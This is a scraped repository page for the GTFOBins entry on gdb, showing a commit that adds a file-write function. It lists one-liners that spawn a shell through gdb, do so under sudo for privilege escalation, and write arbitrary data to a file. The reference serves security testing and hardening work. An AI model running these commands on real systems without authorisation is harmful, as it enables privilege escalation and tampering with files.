This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
41e62d689a449af77cba0ebcdb20bb4871b0e43c
GTFOBins.github.io
/
_gtfobins
/
gdb.md
Andrea Cardaci
41e62d689a
Add gdb file-write
2018-05-28 21:29:34 +02:00
255 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
file-write
code
gdb -nx -ex '!sh' -ex quit
code
sudo gdb -nx -ex '!sh' -ex quit
code
LFILE=file_to_write gdb -nx -ex "dump value $LFILE "data"" -ex quit
Reference in New Issue
View Git Blame
Copy Permalink